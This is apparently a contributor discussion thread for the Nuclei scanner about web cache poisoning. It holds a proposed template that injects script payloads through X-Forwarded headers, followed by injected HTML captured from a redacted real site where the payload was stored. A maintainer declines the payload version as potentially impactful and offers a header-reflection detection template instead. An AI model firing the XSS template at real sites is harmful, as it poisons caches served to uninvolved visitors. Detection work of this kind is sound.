Cache Poisoning Based Stored XSS

[akincibor]

Template Information:

The base was taken from id: cache-poisoning which is just info but in some time this can be escalated to stored xss with severity high.

Nuclei Template:

id: cache-poisoning-stored-xss

info:
  name: Cache Poisoning Based Stored XSS
  author: melbadry9,xelkomy,akincibor
  severity: high
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
  tags: cache,generic

requests:
  - raw:
      - |
        GET /?test=1337 HTTP/1.1
        X-Forwarded-Prefix: cache.example.com"></script><script>alert(document.domain);</script>
        X-Forwarded-Host: cache.example.com"></script><script>alert(document.domain);</script>
        X-Forwarded-For: cache.example.com"></script><script>alert(document.domain);</script>
      - |
        GET /?test=1337 HTTP/1.1
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.example.com")'

This script find stored xss on REDACTED domain, here source code where it was stored (some are url encoded). This source code has generated 4 stored XSS.

<link rel="shortcut icon" href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/favicon.ico" type="image/x-icon" />

<meta name="twitter:image" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/img/logo-share.png" />

<meta property="og:image" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/img/logo-share.png" />

<meta property="og:url" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/home" />

<link type="text/css" rel="stylesheet" media="all" href="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/css/css_cf0bae0e1c3e64e39312e3091903d90b.css" />

<link type="text/css" rel="stylesheet" media="print" href="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/css/css_4a3208b4b932e263e93603b8a01ab85f.css" />

<link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/files/theme/dtheme-direct.css?E" />

  <link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dist/theme.min.css?E">

  <link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dtheme-direct.css?E">

<a href="/script><script>alert(document.domain);</script>, www.REDACTED/" title="Back to home" rel="home"><img src="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/img/logo-theme.svg" alt="REDACTED REDACTED"/></a>

<a href="/script><script>alert(document.domain);</script>, www.REDACTED/" title="Back to home" rel="home">REDACTED REDACTED System of REDACTED</a>

<a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/find/" class="faceted-search-more">

<form action="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/home?destination=taxonomy%2Fterm%2F51%3Fmel%3D10"  accept-charset="UTF-8" method="post" id="user-login-form">

<a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/user/password" title="Request new password via e-mail.">Request new password</a>

<ul class="menu"><li><a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/help" class="menu-help-center">Support portal</a></li><li><a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/user/login" class="menu-login">Log in</a></li></ul>

<script type="text/javascript" src="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/js/js_4b23782d20361e151906c9d68bb785d9.js"></script>

<script src="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dist/theme.min.js?E" async></script>

<script type="text/javascript" src="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/js/js_83f381503f0e482541af1beab8ddb55d.js"></script>

And some on drupal settings:

jQuery.extend(Drupal.settings, {"basePath":"\/script\u003e\u003cscript\u003ealert(document.domain);\u003c\/script\u003e,

[akincibor]

We can also add xss to tags and maybe optimize the matchers

[tess-ss]

Hi @akincibor

Thank you for your time and contribution to this project. This seems to be a very good idea to Include a template like this in Nuclei but I am not sure If we can Include XSS payloads in the template for testing cache poisoning since it can be potentially Impactful

But I suggest using this template which is Web cache poisoning with an unkeyed header which only checks for one header with normal payload. This will be only used for detection purposes as issues like this needs manual work tested on a unique endpoint which is not visited by normal users :)

id: cache-poisoning-unkeyed-header    

info:
  name: Cache Poisoning
  author: melbadry9,xelkomy,akincibor
  severity: low

requests:
  - raw:
      - |
        GET /?mel=9 HTTP/1.1
        X-Forwarded-Prefix: cache.melbadry9.com
        X-Forwarded-Host: cache.melbadry9.com
        X-Forwarded-For: cache.melbadry9.com

      - |
        GET /?mel=9 HTTP/1.1

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.melbadry9.com") == true'

I have tested this template on Portswigger lab Lab: Web cache poisoning with an unkeyed header and the template seems to be working perfect :) @princechaddha @ehsandeep

Thanks, tess